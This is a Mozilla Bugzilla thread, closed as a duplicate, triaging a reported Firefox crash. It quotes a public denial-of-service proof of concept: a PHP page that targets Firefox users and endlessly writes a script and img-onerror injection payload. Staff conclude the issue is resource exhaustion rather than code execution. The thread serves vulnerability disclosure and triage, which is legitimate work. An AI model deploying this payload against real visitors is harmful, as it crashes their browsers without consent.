Closed Bug 822264 Opened 12 years ago Closed 12 years ago

possible exploitable crash

Categories

(Core :: DOM: Core & HTML, defect)

Product:
Core
Component:
DOM: Core & HTML
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 817629

People

(Reporter: curtisk, Unassigned)

References

(
URL
)

Details

reported to sec@
=============//=============
Hi, 
i tried this exploit http://1337day.com/exploit/19964 in a fully updated mozilla browser and it did crash. The problem is that according to the immunity debugger logs, it may be possible for someone to inject a shellcode. In case you need anything, contact me to help out. Best regards
Mavrofidis Manolis

-- 
Πέτρην κοιλαίνει ρανίς ύδατος ενδελεχείη.
http://0x109.tuxfamily.org

=============//=============
copied script from quoted site
=============//=============

<!DOCTYPE html>
<html>
<body>
<?php
/* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
Base64  encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
$exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
//check if victim is Using Mozilla Firefox
$firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
if ($firefox)
{
//loop forever
while(1) {
//print exploit code infinite times.
print(base64_decode($exploit));
}
}
?>
</body>
</html>
 
# 1337day.com [2012-12-17]
Flags: sec-bounty?
What are "immunity debugger logs"? This is a DOS in the most obvious form. Do they have crash report IDs?
Immunity debugger "logs" are not logs, it is a word I used to avoid mentioning everything about the CPU registers, the heap, the stack etc. I did set up immunity dbg(later will be reffered as dbg) as just in-time debugger. Well, according to the dbg and the information it revealed about the firefox crash, registers and the heap allocation show a potential exploit out of this DOS vulnerability. As of this time, I haven't been able to build a stable exploit, I guess it needs some egg-hunting shellcode and I don't have sufficient time for this now, I may be attaching the firefox js engine in the debugger for more information about the subject. 

Best regards,
Manolis
Can you just provide a regular crash ID or a stack trace?
Flags: needinfo?(mmavrofides)
We are getting multiple reports of this same code from various sources. I suspect that there is a site that has this code and we are just now getting informed of these.
http://pastebin.com/SigzqudB

Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC
Version : Mozilla Firefox Beta Version and Normal 17.0.1
Date : 2012-12-06
Vendor : http://www.mozilla.org
Impact : Medium
Contact : sergioyoshiman [at] gmail.com
Twitter : @sergioyoshiman
tested : windows XP SP3 & Windows 7 SP1
Author : Sergio Yoshikata - Lima , Peru
==============================================================
Mozilla Firefox JS POC
"/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
There is a site with the PoC, I already included it in my mail. I'll get you with a Crash ID and a trace in a couple of hours. I have a class now, so bear with me :)
Flags: needinfo?(mmavrofides)
Btw, it is being heavily distributed under a lot of sites such as 1337day.org and the rest dbs containing exploits, beyond the pastebin and the http://1337day.com/exploit/19964 . Full disclosure is the case here
It is being reported as a DOS. If you have information that this is exploitable, I haven't seen that publicly reported yet and I'd like to keep this closed until we know for sure.
Group: core-security
Group: mozilla-corporation-confidential, core-security
Group: mozilla-corporation-confidential
I already told you before, I have built an exploit that doesn't work at the time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the same vulnerability* that makes Firefox crash. I won't be giving the exploit. If I was to give the exploit, I'd build a stable one and then I'd sell it in the market and get some cash.

Don't make the same mistakes other vendors do. Just patch the hole and if the exploit still works, I'll let you know with the exploit included.

Best regards, 
Manolis

PS: The DoS is confirmed. The exploit works in OSes that don't have built-in protections such as ASLR,DEP etc. I'll be adding the crash ID in ten minutes hopefully.
The code here is identical to bug 817629, down to the alert(2) bit.

As I said in that bug, as far as I can tell this is not a security issue other than DoS, and is a duplicate of known non-security bugs.  I'll be happy to be proved wrong, of course!
(In reply to Manolis Mavrofidis from comment #11)
> I already told you before, I have built an exploit that doesn't work at the
> time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the
> same vulnerability* that makes Firefox crash. I won't be giving the exploit.
> If I was to give the exploit, I'd build a stable one and then I'd sell it in
> the market and get some cash.

You don't need an exploit to bypass ASLR/DEP to earn some bug bounty cash from us, but we do need to see something more than resource exhaustion.
OK, I'll dig into the subject further, build a stable exploit, and I'll file a new report with the exploit and/or further bugs that I may find during the exploration. Happy XMAS holidays everyone and guys, fix the bug :)
Manolis.
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Triage: opening this up.
Group: core-security
Flags: sec-bounty? → sec-bounty-
Component: DOM → DOM: Core & HTML
You need to log in before you can comment on or make changes to this bug.